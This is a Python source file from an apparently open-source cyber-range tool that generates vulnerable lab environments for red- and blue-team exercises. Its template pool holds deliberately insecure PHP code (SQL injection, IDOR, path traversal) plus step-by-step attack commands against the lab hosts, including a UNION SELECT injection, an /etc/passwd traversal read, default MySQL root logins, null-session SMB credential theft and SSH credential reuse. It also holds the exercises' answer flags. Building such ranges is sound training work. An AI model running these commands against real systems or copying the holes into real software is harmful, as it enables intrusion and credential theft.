open-range / src /open_range /builder /builder.py
Lars Talian
fix(runtime): stabilize live admission boot path (#102)
5b99233 unverified
"""Three SnapshotBuilder implementations for OpenRange.
- LLMSnapshotBuilder: production -- uses litellm to generate snapshot specs
- TemplateOnlyBuilder: testing -- deterministic, no LLM calls
- FileBuilder: demos -- loads a pre-built snapshot from a JSON file
Each builder implements the SnapshotBuilder protocol and returns a validated
SnapshotSpec that can be rendered into Docker artifacts by the SnapshotRenderer.
"""
from __future__ import annotations
import json
import logging
import os
import random
import re
from copy import deepcopy
from pathlib import Path, PurePosixPath
from typing import Any, Optional
from pydantic import BaseModel, Field
try:
import litellm
except ImportError: # pragma: no cover - exercised only without builder extra
litellm = None
from open_range.protocols import (
BuildContext,
EvidenceItem,
ExploitStep,
FlagSpec,
GoldenPathStep,
NPCPersona,
NPCTrafficSpec,
SnapshotSpec,
TaskSpec,
TruthGraph,
Vulnerability,
)
from open_range.builder.prompts import BUILDER_SYSTEM_PROMPT
from open_range.builder.manifest_graph import (
compile_manifest_topology,
runtime_contract_from_topology,
)
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# LLM raw output model -- matches the LLM's JSON schema exactly
# ---------------------------------------------------------------------------
class _LLMVulnerability(BaseModel):
"""Raw vulnerability as returned by the LLM."""
id: str = ""
type: str = ""
host: str = ""
service: str = ""
injection_point: str = ""
vulnerable_code: str | dict[str, str] = ""
root_cause: str = ""
blast_radius: str = ""
remediation: str = ""
class _LLMExploitStep(BaseModel):
"""Raw exploit step -- LLM uses 'vuln'/'action'/'yields' field names."""
vuln: str = ""
vuln_id: str = ""
action: str = ""
command: str = ""
yields: str = ""
description: str = ""
class _LLMGoldenPathStep(BaseModel):
"""Raw golden path step -- LLM uses 'cmd' and 'expect_stdout'."""
step: int = 0
cmd: str = ""
command: str = ""
expect_stdout: str = ""
expect_in_stdout: str = ""
description: str = ""
host: str = "attacker"
class _LLMFlag(BaseModel):
"""Raw flag definition from LLM output."""
id: str = ""
value: str = ""
path: str = ""
host: str = ""
class _LLMNPCPersona(BaseModel):
"""Raw NPC persona from LLM output."""
name: str = ""
role: str = ""
department: str = ""
reports_to: str = ""
communication_style: str = ""
security_awareness: float = 0.5
susceptibility: dict[str, Any] = Field(default_factory=dict)
routine: dict[str, Any] = Field(default_factory=dict)
accounts: dict[str, Any] = Field(default_factory=dict)
class _LLMTruthGraph(BaseModel):
"""Raw truth graph from LLM output."""
vulns: list[_LLMVulnerability] = Field(default_factory=list)
exploit_chain: list[_LLMExploitStep] = Field(default_factory=list)
class _LLMTask(BaseModel):
"""Raw task specification from LLM output."""
red_briefing: str = ""
blue_briefing: str = ""
class LLMSnapshotOutput(BaseModel):
"""Intermediate model matching the LLM's raw JSON schema.
This captures the exact field names the LLM produces, including
known mismatches like 'vuln' vs 'vuln_id', 'cmd' vs 'command',
and 'expect_stdout' vs 'expect_in_stdout'. Parsing into this model
first makes schema mismatches explicit and testable before mapping
to the canonical SnapshotSpec.
"""
topology: dict[str, Any] = Field(default_factory=dict)
truth_graph: _LLMTruthGraph = Field(default_factory=_LLMTruthGraph)
golden_path: list[_LLMGoldenPathStep] = Field(default_factory=list)
flags: list[_LLMFlag] = Field(default_factory=list)
evidence_spec: dict[str, Any] | list[dict[str, Any]] = Field(default_factory=dict)
npc_personas: list[_LLMNPCPersona] = Field(default_factory=list)
npc_traffic: dict[str, Any] = Field(default_factory=dict)
task: _LLMTask = Field(default_factory=_LLMTask)
files: dict[str, Any] = Field(default_factory=dict)
# ---------------------------------------------------------------------------
# LLM-based builder (production)
# ---------------------------------------------------------------------------
class LLMSnapshotBuilder:
"""Generate snapshot specs via LiteLLM.
Reads model from ``OPENRANGE_BUILDER_MODEL`` env var.
Default: ``azure/gpt-5.2-codex``.
"""
def __init__(
self,
model: str | None = None,
prompt_template: str | None = None,
temperature: float | None = 0.7,
max_retries: int = 3,
max_tokens: int = 32768,
timeout: float = 600.0,
) -> None:
"""Initialize the LLM-based snapshot builder.
Args:
model: LiteLLM model identifier (e.g. 'azure/gpt-5.2-codex').
prompt_template: System prompt override.
temperature: Sampling temperature for LLM calls. None to omit
(required for codex models which don't support temperature).
max_retries: Maximum number of LLM call + parse attempts.
max_tokens: Maximum tokens in LLM response.
timeout: Timeout in seconds for each LLM call.
"""
self.model = model or os.environ.get(
"OPENRANGE_BUILDER_MODEL", "azure/gpt-5.2-codex"
)
self.prompt_template = prompt_template or BUILDER_SYSTEM_PROMPT
# Codex models don't support temperature; auto-set to None
if temperature is not None and "codex" in self.model.lower():
self.temperature = None
else:
self.temperature = temperature
self.max_retries = max_retries
self.max_tokens = max_tokens
self.timeout = timeout
async def build(
self,
manifest: dict,
context: BuildContext,
) -> SnapshotSpec:
"""Call LLM to generate a candidate snapshot spec.
Retries on LLM or parse failures, appending error context to each
subsequent attempt so the LLM can self-correct.
"""
if litellm is None:
raise RuntimeError(
"LLMSnapshotBuilder requires the optional builder extra. "
"Install with `pip install open-range[builder]`."
)
user_payload = (
"Generate a complete cybersecurity range snapshot as valid JSON.\n\n"
+ json.dumps(
{
"manifest": manifest,
"runtime_context": context.model_dump(),
},
indent=2,
)
)
logger.info(
"LLMSnapshotBuilder: starting build (model=%s, tier=%d)",
self.model,
context.tier,
)
last_error: Exception | None = None
last_error_msg: str = ""
for attempt in range(1, self.max_retries + 1):
try:
messages: list[dict[str, str]] = [
{"role": "system", "content": self.prompt_template},
{"role": "user", "content": user_payload},
]
# If retrying after a failure, append error context so LLM can fix
if attempt > 1 and last_error_msg:
messages.append(
{
"role": "user",
"content": (
"Previous attempt failed. "
f"Error: {last_error_msg}\n"
"Please fix and regenerate the complete JSON."
),
}
)
kwargs: dict[str, Any] = {
"model": self.model,
"messages": messages,
"max_tokens": self.max_tokens,
"timeout": self.timeout,
}
# Codex models don't support temperature
if self.temperature is not None:
kwargs["temperature"] = self.temperature
# Request JSON output; some models need the word "json"
# in messages to use json_object format
kwargs["response_format"] = {"type": "json_object"}
logger.debug(
"LLMSnapshotBuilder: sending request (attempt %d/%d, timeout=%.0fs)",
attempt,
self.max_retries,
self.timeout,
)
response = await litellm.acompletion(**kwargs)
raw = response.choices[0].message.content
logger.debug(
"LLMSnapshotBuilder: received response (%d chars)",
len(raw) if raw else 0,
)
spec = _parse_llm_response(raw)
logger.info(
"LLMSnapshotBuilder: build completed (attempt %d/%d, %d vulns, %d golden path steps)",
attempt,
self.max_retries,
len(spec.truth_graph.vulns),
len(spec.golden_path),
)
return spec
except json.JSONDecodeError as exc:
last_error = exc
last_error_msg = f"JSON parse error at position {exc.pos}: {exc.msg}"
logger.warning(
"LLMSnapshotBuilder attempt %d/%d: JSON parse failed: %s",
attempt,
self.max_retries,
last_error_msg,
)
except SnapshotParseError as exc:
last_error = exc
last_error_msg = str(exc)
logger.warning(
"LLMSnapshotBuilder attempt %d/%d: snapshot parse failed: %s",
attempt,
self.max_retries,
last_error_msg,
)
except Exception as exc:
last_error = exc
last_error_msg = f"{type(exc).__name__}: {exc}"
logger.error(
"LLMSnapshotBuilder attempt %d/%d failed: %s",
attempt,
self.max_retries,
last_error_msg,
)
raise RuntimeError(
f"LLMSnapshotBuilder: all {self.max_retries} attempts failed. "
f"Last error: {last_error}"
)
# ---------------------------------------------------------------------------
# Parse error with context
# ---------------------------------------------------------------------------
class SnapshotParseError(Exception):
"""Raised when LLM output cannot be parsed into a valid SnapshotSpec.
Includes the field that failed, received value, expected format,
and a truncated snippet of the raw JSON for debugging.
"""
def __init__(
self,
message: str,
field: str = "",
received: Any = None,
expected: str = "",
raw_json_snippet: str = "",
) -> None:
self.field = field
self.received = received
self.expected = expected
self.raw_json_snippet = raw_json_snippet
parts = [message]
if field:
parts.append(f"field={field!r}")
if received is not None:
recv_str = repr(received)
if len(recv_str) > 200:
recv_str = recv_str[:200] + "..."
parts.append(f"received={recv_str}")
if expected:
parts.append(f"expected={expected}")
if raw_json_snippet:
parts.append(f"raw_json_start={raw_json_snippet!r}")
super().__init__(" | ".join(parts))
# ---------------------------------------------------------------------------
# LLM response parser
# ---------------------------------------------------------------------------
def _parse_llm_response(raw_json: str) -> SnapshotSpec:
"""Parse raw JSON from LLM into a validated SnapshotSpec.
First parses into LLMSnapshotOutput (which matches the LLM's field names),
then maps to the canonical SnapshotSpec models. Handles known field-name
mismatches between the LLM prompt schema and Pydantic models.
"""
raw_snippet = raw_json[:500] if raw_json else ""
try:
data = json.loads(raw_json)
except json.JSONDecodeError:
raise
logger.debug("_parse_llm_response: parsing %d-char JSON response", len(raw_json))
# Parse into intermediate model first for early validation
try:
llm_output = LLMSnapshotOutput.model_validate(data)
except Exception as exc:
raise SnapshotParseError(
"Failed to parse LLM output into LLMSnapshotOutput",
field="root",
received=type(exc).__name__,
expected="valid LLMSnapshotOutput JSON",
raw_json_snippet=raw_snippet,
) from exc
# Map truth_graph vulns
vulns = []
for i, v in enumerate(llm_output.truth_graph.vulns):
try:
vulns.append(
Vulnerability(
id=v.id,
type=v.type,
host=v.host,
service=v.service,
injection_point=v.injection_point,
vulnerable_code=v.vulnerable_code,
root_cause=v.root_cause,
blast_radius=v.blast_radius,
remediation=v.remediation,
)
)
except Exception as exc:
raise SnapshotParseError(
f"Failed to map vulnerability at index {i}",
field=f"truth_graph.vulns[{i}]",
received=v.model_dump(),
expected="valid Vulnerability fields",
raw_json_snippet=raw_snippet,
) from exc
# Map exploit_chain -- LLM uses "vuln"/"action", protocol uses "vuln_id"/"command"
exploit_chain = []
for i, ec in enumerate(llm_output.truth_graph.exploit_chain):
vuln_id = ec.vuln_id or ec.vuln
command = ec.command or ec.action
description = ec.description or ec.yields
if vuln_id or command:
used_fallback = (not ec.vuln_id and ec.vuln) or (not ec.command and ec.action)
if used_fallback:
logger.warning(
"exploit_chain[%d]: used fallback field names (vuln=%r -> vuln_id, action=%r -> command)",
i,
ec.vuln,
ec.action,
)
exploit_chain.append(
ExploitStep(
vuln_id=vuln_id,
command=command,
description=description,
)
)
truth_graph = TruthGraph(
vulns=vulns,
exploit_chain=exploit_chain,
)
# Map golden_path -- LLM uses "cmd"/"expect_stdout", protocol uses "command"/"expect_in_stdout"
# When both are present, 'cmd' takes precedence (LLM prompt uses 'cmd')
golden_path = []
for i, step in enumerate(llm_output.golden_path):
command = step.cmd or step.command
expect = step.expect_stdout or step.expect_in_stdout
if step.cmd and not step.command:
logger.warning(
"golden_path[%d]: used 'cmd' fallback for 'command'",
i,
)
if step.expect_stdout and not step.expect_in_stdout:
logger.warning(
"golden_path[%d]: used 'expect_stdout' fallback for 'expect_in_stdout'",
i,
)
golden_path.append(
GoldenPathStep(
step=step.step,
command=command,
expect_in_stdout=expect,
host=step.host or "attacker",
description=step.description,
)
)
# Map flags
flags = []
for i, f in enumerate(llm_output.flags):
try:
flags.append(
FlagSpec(
id=f.id,
value=f.value,
path=f.path,
host=f.host,
)
)
except Exception as exc:
raise SnapshotParseError(
f"Failed to map flag at index {i}",
field=f"flags[{i}]",
received=f.model_dump(),
expected="valid FlagSpec (id, value, path, host)",
raw_json_snippet=raw_snippet,
) from exc
# Map evidence_spec -- LLM returns dict or list, protocol expects list[EvidenceItem]
evidence_spec: list[EvidenceItem] = []
evidence_raw = llm_output.evidence_spec
if isinstance(evidence_raw, dict):
logger.debug("evidence_spec: converting dict format to list[EvidenceItem]")
for key, val in evidence_raw.items():
if isinstance(val, list):
for item in val:
evidence_spec.append(
EvidenceItem(type="alert", location=key, pattern=str(item))
)
else:
evidence_spec.append(
EvidenceItem(type="log_entry", location=key, pattern=str(val))
)
elif isinstance(evidence_raw, list):
for item in evidence_raw:
if isinstance(item, dict):
try:
evidence_spec.append(EvidenceItem(**item))
except Exception: # noqa: BLE001
logger.warning("Skipping malformed evidence item: %s", item)
# Map NPC personas
npc_personas = []
for i, p in enumerate(llm_output.npc_personas):
try:
npc_personas.append(
NPCPersona(
name=p.name,
role=p.role,
department=p.department,
reports_to=p.reports_to,
communication_style=p.communication_style,
security_awareness=p.security_awareness,
susceptibility=p.susceptibility,
routine=p.routine,
accounts=p.accounts,
)
)
except Exception as exc:
logger.warning(
"npc_personas[%d]: failed to map persona %r: %s",
i,
p.name,
exc,
)
# Map NPC traffic
npc_raw = llm_output.npc_traffic
npc_traffic = NPCTrafficSpec(
level=0,
rate_lambda=npc_raw.get("http_rate", 10),
scripts=["http_traffic.sh", "db_traffic.sh", "ssh_traffic.sh"],
)
# Map task
task = TaskSpec(
red_briefing=llm_output.task.red_briefing,
blue_briefing=llm_output.task.blue_briefing,
)
# Map files -- explicit files from LLM + extract from vulnerable_code
files: dict[str, str] = {}
# 1. Explicit files field from LLM output
if isinstance(llm_output.files, dict):
for key, content in llm_output.files.items():
if isinstance(content, str):
files[key] = content
# 2. Extract deployable files from vulnerable_code entries
for v in vulns:
vc = v.vulnerable_code
if isinstance(vc, dict):
for file_path, code in vc.items():
container_key = f"{v.host}:{file_path}"
if container_key not in files:
files[container_key] = code
elif isinstance(vc, str) and vc.strip():
ip = v.injection_point
if ip.startswith("/") and v.host == "web":
web_doc_root = str(llm_output.topology.get("web_doc_root", "/var/www/portal")).rstrip("/")
container_key = f"web:{web_doc_root}{ip}"
if container_key not in files:
files[container_key] = vc
logger.debug(
"_parse_llm_response: mapped %d vulns, %d golden path steps, %d flags, %d files",
len(vulns),
len(golden_path),
len(flags),
len(files),
)
return SnapshotSpec(
topology=llm_output.topology,
truth_graph=truth_graph,
golden_path=golden_path,
flags=flags,
evidence_spec=evidence_spec,
npc_personas=npc_personas,
npc_traffic=npc_traffic,
task=task,
files=files,
)
# ---------------------------------------------------------------------------
# Template-only builder (testing)
# ---------------------------------------------------------------------------
# Hardcoded vuln pool for deterministic testing
_DEFAULT_VULN_POOL: list[dict[str, Any]] = [
{
"id": "vuln_sqli",
"type": "sqli",
"host": "web",
"service": "nginx+php",
"injection_point": "/search?q=",
"vulnerable_code": (
'<?php $q=$_GET["q"]; '
'$r=$conn->query("SELECT * FROM products WHERE name LIKE \'%$q%\'"); '
"while($row=$r->fetch_assoc()) echo $row['name']; ?>"
),
"root_cause": "Unsanitized user input in SQL query",
"blast_radius": "Full database read access",
"remediation": "mv /var/www/portal/search.php /var/www/portal/search.php.disabled",
"flag_id": "flag_sqli",
"flag_value": "FLAG{sql1_t3st_f1ag}",
"flag_path": "/var/flags/sqli_flag.txt",
"golden_path_steps": [
{
"step": 1,
"cmd": "nmap -sV 10.0.1.0/24",
"expect_stdout": "80/tcp open http",
"host": "attacker",
},
{
"step": 2,
"cmd": "curl http://web/",
"expect_stdout": "Welcome",
"host": "attacker",
},
{
"step": 3,
"cmd": "curl http://web/search?q=test",
"expect_stdout": "product",
"host": "attacker",
},
{
"step": 4,
"cmd": "curl 'http://web/search?q=test%27%20UNION%20SELECT%20flag%20FROM%20flags.secrets--%20'",
"expect_stdout": "FLAG{sql1_t3st_f1ag}",
"host": "attacker",
},
{
"step": 5,
"cmd": "submit_flag FLAG{sql1_t3st_f1ag}",
"expect_stdout": "correct",
"host": "attacker",
},
],
},
{
"id": "vuln_idor",
"type": "idor",
"host": "web",
"service": "nginx+php",
"injection_point": "/api/users/{id}/profile",
"vulnerable_code": (
"<?php $id=$_GET['id']; "
'$stmt=$conn->query("SELECT * FROM users WHERE id=$id"); '
"echo json_encode($stmt->fetch_assoc()); ?>"
),
"root_cause": "No authorization check on user ID parameter",
"blast_radius": "User data exposure, credential leakage",
"remediation": "Add session-based authorization check before query",
"flag_id": "flag1",
"flag_value": "FLAG{1d0r_pr0f1le_l3ak}",
"flag_path": "db:flags.secrets.flag",
"golden_path_steps": [
{
"step": 1,
"cmd": "nmap -sV 10.0.1.0/24",
"expect_stdout": "80/tcp open http",
"host": "attacker",
},
{
"step": 2,
"cmd": "curl http://web/",
"expect_stdout": "Welcome",
"host": "attacker",
},
{
"step": 3,
"cmd": "curl http://web/api/users/1/profile",
"expect_stdout": "admin",
"host": "attacker",
},
{
"step": 4,
"cmd": "curl http://web/api/users/2/profile",
"expect_stdout": "password",
"host": "attacker",
},
{
"step": 5,
"cmd": "mysql -h db -u leaked_user -pleaked_pass -e 'SELECT flag FROM flags.secrets'",
"expect_stdout": "FLAG{1d0r_pr0f1le_l3ak}",
"host": "attacker",
},
{
"step": 6,
"cmd": "submit_flag FLAG{1d0r_pr0f1le_l3ak}",
"expect_stdout": "correct",
"host": "attacker",
},
],
},
{
"id": "vuln_path_traversal",
"type": "path_traversal",
"host": "web",
"service": "nginx+php",
"injection_point": "/download?file=",
"vulnerable_code": (
"<?php $file=$_GET['file']; "
"readfile('/var/www/uploads/' . $file); ?>"
),
"root_cause": "No path sanitization on file parameter",
"blast_radius": "Arbitrary file read on web server",
"remediation": "mv /var/www/portal/download.php /var/www/portal/download.php.disabled",
"flag_id": "flag_path_traversal",
"flag_value": "FLAG{p4th_tr4v3rs4l_fl4g}",
"flag_path": "/var/flags/path_traversal_flag.txt",
"golden_path_steps": [
{
"step": 1,
"cmd": "nmap -sV 10.0.1.0/24",
"expect_stdout": "80/tcp open http",
"host": "attacker",
},
{
"step": 2,
"cmd": "curl http://web/",
"expect_stdout": "Welcome",
"host": "attacker",
},
{
"step": 3,
"cmd": "curl http://web/download?file=report.pdf",
"expect_stdout": "PDF",
"host": "attacker",
},
{
"step": 4,
"cmd": "curl 'http://web/download?file=../../../etc/passwd'",
"expect_stdout": "root:",
"host": "attacker",
},
{
"step": 5,
"cmd": "curl 'http://web/download?file=../../../var/flags/path_traversal_flag.txt'",
"expect_stdout": "FLAG{p4th_tr4v3rs4l_fl4g}",
"host": "attacker",
},
{
"step": 6,
"cmd": "submit_flag FLAG{p4th_tr4v3rs4l_fl4g}",
"expect_stdout": "correct",
"host": "attacker",
},
],
},
{
"id": "vuln_weak_creds",
"type": "weak_creds",
"host": "db",
"service": "mysql",
"injection_point": "mysql -u root -proot",
"vulnerable_code": "",
"root_cause": "MySQL root account with default password",
"blast_radius": "Full database access",
"remediation": "Change root password, restrict remote root login",
"flag_id": "flag1",
"flag_value": "FLAG{w3ak_cr3ds_r00t}",
"flag_path": "db:flags.secrets.flag",
"golden_path_steps": [
{
"step": 1,
"cmd": "nmap -sV 10.0.1.0/24",
"expect_stdout": "80/tcp open http",
"host": "attacker",
},
{
"step": 2,
"cmd": "nmap -sV 10.0.2.0/24",
"expect_stdout": "3306/tcp open mysql",
"host": "attacker",
},
{
"step": 3,
"cmd": "mysql -h db -u root -proot -e 'SHOW DATABASES'",
"expect_stdout": "flags",
"host": "attacker",
},
{
"step": 4,
"cmd": "mysql -h db -u root -proot -e 'SELECT flag FROM flags.secrets'",
"expect_stdout": "FLAG{w3ak_cr3ds_r00t}",
"host": "attacker",
},
{
"step": 5,
"cmd": "submit_flag FLAG{w3ak_cr3ds_r00t}",
"expect_stdout": "correct",
"host": "attacker",
},
],
},
{
"id": "vuln_smb_misconfig",
"type": "smb_misconfig",
"host": "files",
"service": "samba",
"injection_point": "smbclient -N //files/general",
"vulnerable_code": "",
"root_cause": "Samba share allows guest access (null session) — IT enabled it for a migration and never reverted",
"blast_radius": "Read access to internal documents, credential files in share",
"remediation": "Disable guest access, require LDAP authentication for all shares",
"flag_id": "flag1",
"flag_value": "FLAG{smb_null_s3ss10n}",
"flag_path": "/srv/shares/general/admin_creds.txt",
"golden_path_steps": [
{
"step": 1,
"cmd": "nmap -sV 10.0.1.0/24",
"expect_stdout": "80/tcp open http",
"host": "attacker",
},
{
"step": 2,
"cmd": "nmap -sV -p 445 10.0.2.0/24",
"expect_stdout": "445/tcp open microsoft-ds",
"host": "attacker",
},
{
"step": 3,
"cmd": "smbclient -N -L //files/",
"expect_stdout": "general",
"host": "attacker",
},
{
"step": 4,
"cmd": "smbclient -N //files/general -c 'ls'",
"expect_stdout": "admin_creds",
"host": "attacker",
},
{
"step": 5,
"cmd": "smbclient -N //files/general -c 'get admin_creds.txt /tmp/creds.txt'",
"expect_stdout": "getting file",
"host": "attacker",
},
{
"step": 6,
"cmd": "cat /tmp/creds.txt",
"expect_stdout": "FLAG{smb_null_s3ss10n}",
"host": "attacker",
},
{
"step": 7,
"cmd": "submit_flag FLAG{smb_null_s3ss10n}",
"expect_stdout": "correct",
"host": "attacker",
},
],
},
{
"id": "vuln_credential_reuse",
"type": "credential_reuse",
"host": "ldap",
"service": "openldap",
"injection_point": "LDAP bind with web app service account credentials",
"vulnerable_code": "",
"root_cause": "Web app config.php contains LDAP bind DN and password; same credentials reuse for SSH on db host",
"blast_radius": "Lateral movement from web → db via credential reuse, flag exfiltration",
"remediation": "Unique credentials per service, rotate LDAP bind password, restrict SSH key-only auth",
"flag_id": "flag1",
"flag_value": "FLAG{cr3d_r3us3_p1v0t}",
"flag_path": "/var/flags/flag1.txt",
"golden_path_steps": [
{
"step": 1,
"cmd": "nmap -sV 10.0.1.0/24",
"expect_stdout": "80/tcp open http",
"host": "attacker",
},
{
"step": 2,
"cmd": "curl 'http://web/download?file=../../../var/www/config.php'",
"expect_stdout": "ldap_bind_pw",
"host": "attacker",
},
{
"step": 3,
"cmd": "ldapsearch -x -H ldap://{ldap_host} -D '{ldap_bind_dn}' -w '{ldap_bind_pw}' -b '{ldap_search_base_dn}' '(uid=*)'",
"expect_stdout": "dn: uid=",
"host": "attacker",
},
{
"step": 4,
"cmd": "sshpass -p '{credential_reuse_password}' ssh {credential_reuse_user}@{credential_reuse_host} 'cat /var/flags/flag1.txt'",
"expect_stdout": "FLAG{cr3d_r3us3_p1v0t}",
"host": "attacker",
},
{
"step": 5,
"cmd": "submit_flag FLAG{cr3d_r3us3_p1v0t}",
"expect_stdout": "correct",
"host": "attacker",
},
],
},
]
class TemplateOnlyBuilder:
"""Deterministic builder for testing -- no LLM calls.
Picks vulnerabilities from a hardcoded pool based on seed.
"""
def __init__(self, vuln_pool: list[dict[str, Any]] | None = None) -> None:
"""Initialize with an optional custom vulnerability pool."""
self.vuln_pool = vuln_pool or _DEFAULT_VULN_POOL
async def build(
self,
manifest: dict,
context: BuildContext,
) -> SnapshotSpec:
"""Build a canonicalized snapshot deterministically from templates."""
rng = random.Random(context.seed if context.seed is not None else 42)
# Filter pool to allowed bug_families
allowed = {
str(v).strip()
for v in manifest.get("bug_families", [])
if str(v).strip()
}
if allowed:
candidates = [v for v in self.vuln_pool if v["type"] in allowed]
else:
candidates = list(self.vuln_pool)
if allowed and not candidates:
available = sorted({str(v.get("type", "")).strip() for v in self.vuln_pool if v.get("type")})
requested = sorted(allowed)
raise ValueError(
"No template vulnerabilities match manifest bug_families. "
f"requested={requested}, available={available}"
)
if "prefer_live_admission_compatible_vulns" in context.narrative_hints:
# Keep strict live admission on task paths the current zone policy
# can actually reach from the attacker host.
live_supported = {"sqli", "path_traversal"}
supported = [v for v in candidates if v["type"] in live_supported]
if supported:
candidates = supported
# Avoid recently used vuln classes
previous = set(context.previous_vuln_classes)
preferred = [v for v in candidates if v["type"] not in previous]
if preferred:
candidates = preferred
# Pick vulns, respecting tier step target.
# Each template vuln contributes ~5 golden path steps, so cap count
# to fit within the tier's ±20% step window.
from open_range.validator.difficulty import TIER_TARGETS, TOLERANCE
tier = int(manifest.get("tier", context.tier) or context.tier)
step_target = TIER_TARGETS.get(tier, 8)
max_steps_hi = int(step_target * (1 + TOLERANCE))
# Each vuln adds ~5 steps but the first nmap step is shared, so
# subsequent vulns add ~4 incremental steps.
avg_first = 5
avg_extra = 4
tier_max_vulns = max(1, 1 + (max_steps_hi - avg_first) // avg_extra)
max_v_raw = manifest.get("difficulty", {}).get("max_vulns", 2)
min_v_raw = manifest.get("difficulty", {}).get("min_vulns", 1)
max_vulns = max(1, int(max_v_raw))
min_vulns = max(1, int(min_v_raw))
if min_vulns > max_vulns:
min_vulns = max_vulns
effective_max = max(1, min(max_vulns, tier_max_vulns, len(candidates)))
effective_min = min(min_vulns, effective_max)
count = rng.randint(effective_min, effective_max)
chosen = rng.sample(candidates, count)
# Build topology from manifest
topo = manifest.get("topology", {})
hosts = [h["name"] if isinstance(h, dict) else h for h in topo.get("hosts", [])]
networks = topo.get("networks", [])
zones: dict[str, list[str]] = {}
for h in topo.get("hosts", []):
if isinstance(h, dict):
z = h.get("zone", "default")
zones.setdefault(z, []).append(h["name"])
topology: dict[str, Any] = {
"tier": int(manifest.get("tier", context.tier) or context.tier),
"hosts": hosts,
"zones": zones,
"difficulty": manifest.get("difficulty", {}),
"org_name": manifest.get("company", {}).get("name", "OpenRange"),
"domain": manifest.get("company", {}).get("domain", "corp.local"),
"users": _manifest_topology_users(
manifest,
seed=context.seed,
weak_creds_enabled=any(v["type"] == "weak_creds" for v in chosen),
),
"mysql_root_password": "root" if any(v["type"] == "weak_creds" for v in chosen) else "r00tP@ss!",
}
topology = compile_manifest_topology(manifest, topology)
runtime_contract = runtime_contract_from_topology(topology, manifest=manifest)
topology["runtime_contract"] = runtime_contract
# Build truth graph
vulns = []
exploit_chain = []
flags = []
golden_path: list[GoldenPathStep] = []
step_offset = 0
for idx, raw in enumerate(chosen):
v = _realize_template_vuln(
raw,
topology=topology,
runtime_contract=runtime_contract,
)
vulns.append(
Vulnerability(
id=v["id"],
type=v["type"],
host=v["host"],
service=v.get("service", ""),
injection_point=v.get("injection_point", ""),
vulnerable_code=v.get("vulnerable_code", ""),
root_cause=v.get("root_cause", ""),
blast_radius=v.get("blast_radius", ""),
remediation=v.get("remediation", ""),
)
)
exploit_chain.append(
{
"vuln_id": v["id"],
"command": v.get("injection_point", ""),
"description": f"Exploit {v['type']} on {v.get('host', 'target')}",
}
)
flags.append(
FlagSpec(
id=v.get("flag_id", f"flag{idx+1}"),
value=v.get("flag_value", f"FLAG{{test_{idx+1}}}"),
path=v.get("flag_path", f"/var/flags/flag{idx+1}.txt"),
host=v.get("flag_host", v.get("host", runtime_contract["web_host"])),
)
)
for gs in v.get("golden_path_steps", []):
cmd = gs["cmd"]
# Deduplicate shared recon steps (e.g. nmap) across vulns
if any(s.command == cmd for s in golden_path):
continue
step_offset += 1
golden_path.append(
GoldenPathStep(
step=step_offset,
command=cmd,
expect_in_stdout=gs["expect_stdout"],
host=gs.get("host", "attacker"),
description=gs.get("description", ""),
)
)
truth_graph = TruthGraph(vulns=vulns, exploit_chain=exploit_chain)
evidence_spec = [
EvidenceItem(
type="log_entry",
location=f"{runtime_contract['web_host']}:/var/log/app/access.log",
pattern="attack pattern from attacker IP",
),
EvidenceItem(
type="alert",
location="siem:/var/log/siem/consolidated/all.log",
pattern="Suspicious activity detected",
),
]
company = manifest.get("company", {}) if isinstance(manifest.get("company"), dict) else {}
company_name = str(company.get("name", "the company"))
industry = str(company.get("industry", "corporate"))
task = TaskSpec(
red_briefing=(
f"{topology['org_name']} is a {manifest.get('company', {}).get('industry', 'corporate')} "
"company with web and internal services. "
"Investigate the environment and capture the flags."
),
blue_briefing=(
f"You are the SOC analyst for {topology['org_name']}. Monitor the SIEM for suspicious activity, "
"investigate alerts, and respond to threats."
),
)
npc_traffic = NPCTrafficSpec(
level=0,
rate_lambda=10.0,
scripts=["http_traffic.sh", "db_traffic.sh"],
)
snapshot = SnapshotSpec(
topology=topology,
truth_graph=truth_graph,
golden_path=golden_path,
flags=flags,
evidence_spec=evidence_spec,
npc_personas=[],
npc_traffic=npc_traffic,
task=task,
)
snapshot.topology = compile_manifest_topology(manifest, snapshot.topology)
snapshot.files = render_template_payloads(snapshot, manifest=manifest)
logger.info(
"TemplateOnlyBuilder: built snapshot with %d vulns (seed=%s)",
len(vulns),
context.seed,
)
return snapshot
# ---------------------------------------------------------------------------
# Template payload helpers
# ---------------------------------------------------------------------------
def _realize_template_vuln(
template: dict[str, Any],
*,
topology: dict[str, Any],
runtime_contract: dict[str, str],
) -> dict[str, Any]:
realized = deepcopy(template)
template_host = str(template.get("host", "")).strip()
service = str(template.get("service", "")).strip().lower()
resolved_host = _resolve_vuln_host(
template_host,
service=service,
topology=topology,
runtime_contract=runtime_contract,
)
realized["host"] = resolved_host
vuln_type = str(template.get("type", "")).strip()
if vuln_type == "credential_reuse":
realized["flag_host"] = runtime_contract.get(
"credential_reuse_host",
runtime_contract.get("db_host", resolved_host),
)
else:
realized["flag_host"] = resolved_host
for field in (
"injection_point",
"vulnerable_code",
"root_cause",
"blast_radius",
"remediation",
):
value = realized.get(field)
if isinstance(value, str):
realized[field] = _rewrite_template_runtime_text(value, runtime_contract)
raw_steps = template.get("golden_path_steps", [])
realized_steps: list[dict[str, Any]] = []
if isinstance(raw_steps, list):
for raw_step in raw_steps:
if not isinstance(raw_step, dict):
continue
step = deepcopy(raw_step)
cmd = str(step.get("cmd", ""))
expect = str(step.get("expect_stdout", ""))
step["cmd"] = _rewrite_template_runtime_text(cmd, runtime_contract)
step["expect_stdout"] = _rewrite_template_runtime_text(expect, runtime_contract)
realized_steps.append(step)
realized["golden_path_steps"] = realized_steps
return realized
def _resolve_vuln_host(
template_host: str,
*,
service: str,
topology: dict[str, Any],
runtime_contract: dict[str, str],
) -> str:
hosts = _host_names(topology.get("hosts", []))
alias_map = {
"web": runtime_contract.get("web_host", "web"),
"db": runtime_contract.get("db_host", "db"),
"ldap": runtime_contract.get("ldap_host", "ldap"),
}
if template_host:
if template_host in hosts:
return template_host
if template_host in alias_map and alias_map[template_host]:
return alias_map[template_host]
if any(marker in service for marker in ("mysql", "mariadb", "postgres")):
candidate = runtime_contract.get("db_host", "db")
if not hosts or candidate in hosts:
return candidate
if any(marker in service for marker in ("ldap", "openldap")):
candidate = runtime_contract.get("ldap_host", "ldap")
if not hosts or candidate in hosts:
return candidate
if any(marker in service for marker in ("nginx", "apache", "http", "php")):
candidate = runtime_contract.get("web_host", "web")
if not hosts or candidate in hosts:
return candidate
if template_host:
return template_host
if hosts:
return hosts[0]
return runtime_contract.get("web_host", "web")
